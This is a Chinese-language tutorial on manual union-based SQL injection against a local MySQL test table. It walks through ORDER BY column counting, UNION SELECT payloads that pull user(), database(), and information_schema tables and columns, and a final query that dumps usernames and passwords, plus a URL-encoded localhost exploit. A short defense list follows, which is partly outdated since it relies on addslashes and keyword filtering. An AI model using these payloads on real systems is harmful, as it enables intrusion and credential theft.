💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、星火、月之暗面及文生图 广告
**concat:** 用于字符串连接; ``` select concat('a','b',1); ``` ![](https://img.kancloud.cn/76/c5/76c5d3097af16bff6996f5198b87838d_271x110.png) **concat_ws:** 用于字符串连接,第一个参数是连接字符串的分隔符; ``` select concat_ws(',',1,2,3); ``` ![](https://img.kancloud.cn/4a/8a/4a8aea8edf15b7317c8fa488368e93c9_299x114.png) **手工注入** 第一步确定列数 比如如下图user表有4列(id、username、pwd、sex) ![](https://img.kancloud.cn/1d/98/1d98bb35b2c17af7c87968f33cef3182_304x101.png) ~~~ select * from user where id = 1 order by 1 select * from user where id = 1 order by 2 ... select * from user where id = 1 order by n ~~~ 超出4则会报错或者不返回信息,这个根据不同网站处理方法不一样 查出4列 ``` select * from user where id = 1 union select 1,2,3,4; ``` 小修改下就查出数据库的用户名而不是use表的 ``` select * from user where id = 1 union select 1,user(),3,4; ``` ![](https://img.kancloud.cn/d1/04/d104dc7d05c12e34c0f70906d4737c79_370x98.png) >[danger]注意:上面确定多少列后后面必须跟多少列否则会报`The used SELECT statements have a different number of columns`所以`union select 1,2,3;`和`union select 1,2,3,4,5;`都是不行的 使用**database()** 函数输出数据库名称 ``` select * from user where id = 1 union select 1,database(),3,4; ``` ![](https://img.kancloud.cn/b1/ec/b1eca0442989da9e623f9b8d0609cb4c_589x109.png) 使用**负数**只输出union的select值: ``` select * from user where id = -1 union select 1,database(),3,4; ``` ![](https://img.kancloud.cn/80/f8/80f8aa6dab5bf24b821d17201843b61e_568x99.png) 综合上述信息 ``` select * from user where id = -1 union select user(),database(),3,4; ``` ![](https://img.kancloud.cn/3b/72/3b72cd73ccffd025f0fd3960b05440ee_632x94.png) 更具上面的信息找出对应的表 ``` select * from user where id = -1 union select 1,table_name,3,4 from information_schema.tables where table_schema = 'test'; ``` ![](https://img.kancloud.cn/65/ec/65ecf71df665bd03acca17d2a1a5d78b_286x191.png) >[danger] 注意union时 user表与information_schema.tables的表和字段的字符集和排序规则要一样,我的mysql的information_schema数据库及其表和字段配需规则都是utf8_general_ci而user的却是utf8_unicode_ci所以就报了`1271 - Illegal mix of collations for operation 'UNION'`的错误 > 根据表查询表有哪些字段 ``` select * from user where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema = 'test' and table_name='user'; ``` ![](https://img.kancloud.cn/74/33/7433f459bfba031d784a3d4f638be27b_294x128.png) 最后查出有用的信息 ``` select * from user where id = -1 union select 1,concat_ws(char(32,58,32),id,username,pwd,sex),3,4 from user; ``` ![](https://img.kancloud.cn/dc/7f/dc7fb632fa66212ecf68a74ba6fc7b16_375x113.png) http://localhost/test.php?id=1 and 1=1; 利用:`http://localhost/test.php?id=-1%20union%20select%201,user%28%29,3%20from%20book` 防御 转义 ①:开启 gpc (php5.4的更高版本中,这个选项被去掉了,避免用户依赖自动转义,高版本需要用户自己转义) ②:mysql_real_escape_string ③:addslashes ④:关键字过滤